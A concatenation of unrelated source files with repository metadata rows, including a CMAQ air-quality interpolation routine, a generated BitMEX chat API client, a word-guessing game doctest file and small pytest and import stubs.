fac = epa_util.check_cmaq_units(df, param='PM25', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM25').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'CO':
if 'CO' in model.keys:
print('Interpolating CO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='CO', aqs_param=i)
cmaq = model.get_var(lay=0, param='CO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOY':
if 'NOY' in model.keys:
print('Interpolating NOY:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOY', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOY').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO2':
if 'SO2' in model.keys:
print('Interpolating SO2')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NOX':
            if ('NO' in model.keys) & ('NO2' in model.keys):
print('Interpolating NOX:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NOX', aqs_param=i)
cmaq = model.get_var(lay=0, param='NOX').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO':
if ('NO' in model.keys):
print('Interpolating NO:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO2':
if ('NO2' in model.keys):
print('Interpolating NO2:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO2', aqs_param=i)
cmaq = model.get_var(lay=0, param='NO2').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'SO4f':
if ('PM25_SO4' in model.keys) | ('ASO4J' in model.keys) | ('ASO4I' in model.keys):
print('Interpolating PSO4:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='SO4f', aqs_param=i)
cmaq = model.get_var(lay=0, param='SO4f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'PM10':
if ('PM_TOTAL' in model.keys) | ('ASO4K' in model.keys):
print('Interpolating PM10:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='PM10', aqs_param=i)
cmaq = model.get_var(lay=0, param='PM10').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values, model.longitude.values,
radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'NO3f':
if ('PM25_NO3' in model.keys) | ('ANO3J' in model.keys) | ('ANO3I' in model.keys):
print('Interpolating PNO3:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='NO3f', aqs_param=i)
                cmaq = model.get_var(lay=0, param='NO3f').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ECf':
if ('PM25_EC' in model.keys) | ('AECI' in model.keys) | ('AECJ' in model.keys):
print('Interpolating PEC:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ECf', aqs_param=i)
cmaq = model.get_var(lay=0, param='ECf').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'OCf':
if ('APOCJ' in model.keys):
print('Interpolating OCf:')
df = g.get_group(i)
                fac = epa_util.check_cmaq_units(df, param='OCf', aqs_param=i)
                cmaq = model.get_var(lay=0, param='OC').compute() * fac
                df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ETHANE':
if ('ETHA' in model.keys):
print('Interpolating Ethane:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ETHA', aqs_param=i)
cmaq = model.get_var(lay=0, param='ETHA').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'BENZENE':
if ('BENZENE' in model.keys):
print('Interpolating BENZENE:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='BENZENE', aqs_param=i)
cmaq = model.get_var(lay=0, param='BENZENE').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TOLUENE':
if ('TOL' in model.keys):
print('Interpolating Toluene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='TOL', aqs_param=i)
cmaq = model.get_var(lay=0, param='TOL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'ISOPRENE':
if ('ISOP' in model.keys):
print('Interpolating Isoprene:')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='ISOP', aqs_param=i)
cmaq = model.get_var(lay=0, param='ISOP').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'O-XYLENE':
if ('XYL' in model.keys):
print('Interpolating Xylene')
df = g.get_group(i)
fac = epa_util.check_cmaq_units(df, param='XYL', aqs_param=i)
cmaq = model.get_var(lay=0, param='XYL').compute() * fac
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WS':
if ('WSPD10' in model.keys):
print('Interpolating WS:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WSPD10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'TEMP':
if 'TEMP2' in model.keys:
print('Interpolating TEMP:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='TEMP2')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
elif i == 'WD':
if 'WDIR10' in model.keys:
print('Interpolating WD:')
df = g.get_group(i)
cmaq = model.get_var(lay=0, param='WDIR10')
df = interpo.interp_to_pt_obs(cmaq, df, model.latitude.values,
model.longitude.values, radius=model.dset.XCELL, daily=True)
dfs.append(df)
df = concat(dfs)
df.loc[df.Obs < 0] = NaN
return df
def combine_tolnet_model(model, obs, param='O3', resample=False, freq='H'):
"""Short summary.
Parameters
----------
model : type
Description of parameter `model`.
obs : type
Description of parameter `obs`.
param : type
Description of parameter `param` (the default is 'O3').
resample : type
Description of parameter `resample` (the default is False).
freq : type
Description of parameter `freq` (the default is 'H').
Returns
-------
type
Description of returned object.
"""
    # Won't do too much: just interpolate the model to the observations in x-y space.
lat = obs.dset.Latitude
lon = obs.dset.Longitude
dset = find_nearest_latlon_xarray(model.dset[param], lat=lat, lon=lon, radius=model.dset.XCELL)
if resample:
dset = dset.resample(time=freq).mean()
tolnet = obs.dset.resample(time=freq).mean()
return dset, tolnet
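The `resample(time=freq).mean()` step above averages both datasets onto a common time grid before comparison. A minimal pandas sketch of the same alignment, using synthetic data rather than TOLNET profiles:

```python
import pandas as pd

# Two synthetic 30-minute series averaged onto an hourly grid, mirroring
# the freq='H' default used by combine_tolnet_model.
times = pd.date_range('2024-01-01', periods=6, freq='30min')
model_ts = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], index=times)
obs_ts = pd.Series([2.0, 2.0, 4.0, 4.0, 6.0, 6.0], index=times)

model_h = model_ts.resample('H').mean()  # hourly means of the model series
obs_h = obs_ts.resample('H').mean()      # hourly means of the observations
```

After resampling, both series share an hourly index and can be compared point for point.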
from app_server.libs.render_json import render_json
def hello():
return render_json({}, message='hello from apiv1')
#!/usr/bin/env python
from pandas3js.views.jsmesh import create_jsmesh_view, create_jslabelmesh_view
from pandas3js.views.jsrenderer import create_jsrenderer
from pandas3js.views.jsscene import create_js_scene_view
from pandas3js.views.jsgui import create_gui
# coding: utf-8
"""
BitMEX API
## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) ---- #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ---- ## All API Endpoints Click to expand a section. # noqa: E501
OpenAPI spec version: 1.2.0
Contact: support@bitmex.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from bitmex_swagger.api_client import ApiClient
class ChatApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def chat_get(self, **kwargs): # noqa: E501
"""Get chat messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get(async=True)
>>> result = thread.get()
:param async bool
:param float count: Number of results to fetch.
:param float start: Starting ID for results.
:param bool reverse: If true, will sort results newest first.
:param float channel_id: Channel id. GET /chat/channels for ids. Leave blank for all.
:return: list[Chat]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_with_http_info(self, **kwargs): # noqa: E501
"""Get chat messages. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param float count: Number of results to fetch.
:param float start: Starting ID for results.
:param bool reverse: If true, will sort results newest first.
:param float channel_id: Channel id. GET /chat/channels for ids. Leave blank for all.
:return: list[Chat]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['count', 'start', 'reverse', 'channel_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
if 'channel_id' in params:
query_params.append(('channelID', params['channel_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/chat', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Chat]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def chat_get_channels(self, **kwargs): # noqa: E501
"""Get available channels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_channels(async=True)
>>> result = thread.get()
:param async bool
:return: list[ChatChannel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_channels_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_channels_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_channels_with_http_info(self, **kwargs): # noqa: E501
"""Get available channels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_channels_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: list[ChatChannel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get_channels" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/chat/channels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ChatChannel]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def chat_get_connected(self, **kwargs): # noqa: E501
"""Get connected users. # noqa: E501
Returns an array with browser users in the first position and API users (bots) in the second position. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_connected(async=True)
>>> result = thread.get()
:param async bool
:return: ConnectedUsers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.chat_get_connected_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.chat_get_connected_with_http_info(**kwargs) # noqa: E501
return data
def chat_get_connected_with_http_info(self, **kwargs): # noqa: E501
"""Get connected users. # noqa: E501
Returns an array with browser users in the first position and API users (bots) in the second position. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.chat_get_connected_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: ConnectedUsers
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method chat_get_connected" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json', 'application/x-www-form-urlencoded'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/chat/connected', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ConnectedUsers',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def chat_new(self, message, **kwargs):  # noqa: E501
        """Send a chat message.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.chat_new(message, async=True)
        >>> result = thread.get()

        :param async bool
        :param str message: (required)
        :param float channel_id: Channel to post to. Default 1 (English).
        :return: Chat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.chat_new_with_http_info(message, **kwargs)  # noqa: E501
        else:
            (data) = self.chat_new_with_http_info(message, **kwargs)  # noqa: E501
            return data

    def chat_new_with_http_info(self, message, **kwargs):  # noqa: E501
        """Send a chat message.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.chat_new_with_http_info(message, async=True)
        >>> result = thread.get()

        :param async bool
        :param str message: (required)
        :param float channel_id: Channel to post to. Default 1 (English).
        :return: Chat
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['message', 'channel_id']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method chat_new" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'message' is set
        if ('message' not in params or
                params['message'] is None):
            raise ValueError("Missing the required parameter `message` when calling `chat_new`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}
        if 'message' in params:
            form_params.append(('message', params['message']))  # noqa: E501
        if 'channel_id' in params:
            form_params.append(('channelID', params['channel_id']))  # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json', 'application/x-www-form-urlencoded'])  # noqa: E501

        # Authentication setting
        auth_settings = ['apiKey', 'apiNonce', 'apiSignature']  # noqa: E501

        return self.api_client.call_api(
            '/chat', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Chat',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
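The generated `chat_new_with_http_info` method above follows swagger-codegen's fixed pattern: validate keyword arguments against `all_params`, check the required `message`, then map the Python-side `channel_id` parameter onto the wire-format form field `channelID`. A standalone sketch of just that validation-and-mapping step (hypothetical helper, not part of the generated client):

```python
def build_chat_form_params(message, **kwargs):
    """Validate kwargs and build the form-parameter list the way
    chat_new_with_http_info does, mapping channel_id -> channelID."""
    all_params = ['channel_id']
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method chat_new" % key
            )
    if message is None:
        raise ValueError(
            "Missing the required parameter `message` when calling `chat_new`")
    form_params = [('message', message)]
    if 'channel_id' in kwargs:
        # The server expects camelCase field names on the wire.
        form_params.append(('channelID', kwargs['channel_id']))
    return form_params
```

With it, `build_chat_form_params("hello", channel_id=1)` yields the same `(name, value)` pairs the client posts to `/chat`.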
| 40.719715 | 1,509 | 0.611912 | 2,001 | 17,143 | 5.043978 | 0.136432 | 0.045972 | 0.022194 | 0.028535 | 0.80967 | 0.797483 | 0.79461 | 0.776281 | 0.763995 | 0.76023 | 0 | 0.015412 | 0.288456 | 17,143 | 420 | 1,510 | 40.816667 | 0.811936 | 0.053433 | 0 | 0.740909 | 0 | 0 | 0.186308 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.018182 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ad2c87fac373f6365a9f40490e06109096926f29 | 4,334 | py | Python | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | project/wheel/tests/05.py | tingjunwong/cs88-python-data-structure | 6d0da2c1468b9a571c742a62ab0b8cf625688591 | [
"MIT"
] | null | null | null | test = {
  'name': 'Problem 5',
  'points': 4,
  'suites': [
    {
      'cases': [
        {
          'code': r"""
          >>> w = WordMunch("one two, Two. tHree")
          >>> w.words()
          ['one', 'three', 'two']
          >>> w.frequency()['o']
          2
          >>> key_of_max(w.frequency())
          'e'
          """,
          'hidden': False,
          'locked': False
        },
        {
          'code': r"""
          >>> w = WordMunch("one two, Two. tHree")
          >>> w.words()
          ['one', 'three', 'two']
          >>> w.frequency()['o']
          2
          >>> key_of_max(w.frequency())
          'e'
          """,
          'hidden': False,
          'locked': False
        },
        {
          'code': r"""
          >>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
          >>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
          >>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
          >>> b0 = Board(SecretWord('three'))
          >>> b1 = Board(SecretWord('three'))
          >>> b2 = Board(SecretWord('three'))
          >>> c0.guess(b0) # Case 1.1
          'o'
          >>> b0.guess(c0.guess(b0)) # Case 1.1
          0
          >>> c0.guess(b0) # Case 1.2
          'e'
          >>> b0.guess(c0.guess(b0)) # Case 1.2
          2
          >>> c0.guess(b0) # Case 1.3
          'l'
          >>> b0.guess(c0.guess(b0)) # Case 1.3
          0
          """,
          'hidden': False,
          'locked': False
        },
        {
          'code': r"""
          >>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
          >>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
          >>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
          >>> b0 = Board(SecretWord('three'))
          >>> b1 = Board(SecretWord('three'))
          >>> b2 = Board(SecretWord('three'))
          >>> c1.guess(b1) # Case 2.1
          'e'
          >>> b1.guess(c1.guess(b1)) # Case 2.1
          2
          >>> c1.guess(b1) # Case 2.2
          'l'
          >>> b1.guess(c1.guess(b1)) # Case 2.2
          0
          >>> c1.guess(b1) # Case 2.3
          'h'
          >>> b1.guess(c1.guess(b1)) # Case 2.3
          1
          """,
          'hidden': False,
          'locked': False
        },
        {
          'code': r"""
          >>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
          >>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
          >>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
          >>> b0 = Board(SecretWord('three'))
          >>> b1 = Board(SecretWord('three'))
          >>> b2 = Board(SecretWord('three'))
          >>> c0.guess(b0) # Case 1.1
          'o'
          >>> b0.guess(c0.guess(b0)) # Case 1.1
          0
          >>> c0.guess(b0) # Case 1.2
          'e'
          >>> b0.guess(c0.guess(b0)) # Case 1.2
          2
          >>> c0.guess(b0) # Case 1.3
          'l'
          >>> b0.guess(c0.guess(b0)) # Case 1.3
          0
          """,
          'hidden': False,
          'locked': False
        },
        {
          'code': r"""
          >>> c0 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']))
          >>> c1 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 1)
          >>> c2 = ComputerPlayer(WordSet(['three', 'toooooo', 'ellen']), 2)
          >>> b0 = Board(SecretWord('three'))
          >>> b1 = Board(SecretWord('three'))
          >>> b2 = Board(SecretWord('three'))
          >>> c1.guess(b1) # Case 2.1
          'e'
          >>> b1.guess(c1.guess(b1)) # Case 2.1
          2
          >>> c1.guess(b1) # Case 2.2
          'l'
          >>> b1.guess(c1.guess(b1)) # Case 2.2
          0
          >>> c1.guess(b1) # Case 2.3
          'h'
          >>> b1.guess(c1.guess(b1)) # Case 2.3
          1
          """,
          'hidden': False,
          'locked': False
        }
      ],
      'scored': True,
      'setup': r"""
      >>> from wordset import WordMunch
      >>> from wordset import WordSet
      >>> from board import Board
      >>> from secret import SecretWord
      >>> from utils import key_of_max
      >>> from player import ComputerPlayer
      """,
      'teardown': '',
      'type': 'doctest'
    }
  ]
}
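Each case above stores its doctest source in the `code` key; graders like ok execute that string in a prepared environment and count failures. A minimal sketch of that execution step using only the stdlib `doctest` module (hypothetical `run_case` helper, not the actual ok client):

```python
import doctest

def run_case(code, env):
    """Parse an ok-style doctest string and run it against the given
    globals dict, returning (failures, attempts)."""
    parser = doctest.DocTestParser()
    test = parser.get_doctest(code, env, name="case", filename="<case>", lineno=0)
    runner = doctest.DocTestRunner(verbose=False)
    runner.run(test)
    return runner.failures, runner.tries

# A passing one-example case: one attempt, zero failures.
failures, tries = run_case(">>> 1 + 1\n2\n", {})
```

The `setup` string would be run the same way first, so names like `WordMunch` land in `env` before the case executes.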
| 30.097222 | 76 | 0.403784 | 439 | 4,334 | 3.972665 | 0.127563 | 0.144495 | 0.178899 | 0.227064 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0.875 | 0 | 0.059406 | 0.394093 | 4,334 | 143 | 77 | 30.307692 | 0.604722 | 0 | 0 | 0.678322 | 0 | 0 | 0.850946 | 0.233041 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.041958 | 0 | 0.041958 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ad9b5b29e71e25d8b9345949707fc5bde0fa863d | 98 | py | Python | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | 1 | 2021-01-10T09:03:20.000Z | 2021-01-10T09:03:20.000Z | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | null | null | null | pytest/test_Example1.py | islam-shamiul/appium-python | 6971a97c336c8da799995a7e313bad4eae6f6eb3 | [
"MIT"
] | null | null | null | def test_methodA():
    print("this is test A")


def test_methodB():
    print("this is test B")
| 14 | 27 | 0.632653 | 16 | 98 | 3.75 | 0.5625 | 0.233333 | 0.366667 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22449 | 98 | 6 | 28 | 16.333333 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
0f41363900067e0b080b51a082755e77c5e45599 | 3,069 | py | Python | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | ai-fast-track/mantisshrimp | cc6d6a4a048f6ddda2782b6593dcd6b083a673e4 | [
"Apache-2.0"
] | 580 | 2020-09-10T06:29:57.000Z | 2022-03-29T19:34:54.000Z | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | ai-fast-track/mantisshrimp | cc6d6a4a048f6ddda2782b6593dcd6b083a673e4 | [
"Apache-2.0"
] | 691 | 2020-09-05T03:08:34.000Z | 2022-03-31T23:47:06.000Z | icevision/models/mmdet/models/fcos/backbones/resnet_fpn.py | lgvaz/mantisshrimp2 | 743cb7df0dae7eb1331fc2bb66fc9ca09db496cd | [
"Apache-2.0"
] | 105 | 2020-09-09T10:41:35.000Z | 2022-03-25T17:16:49.000Z | __all__ = [
    "resnet50_caffe_fpn_gn_head",
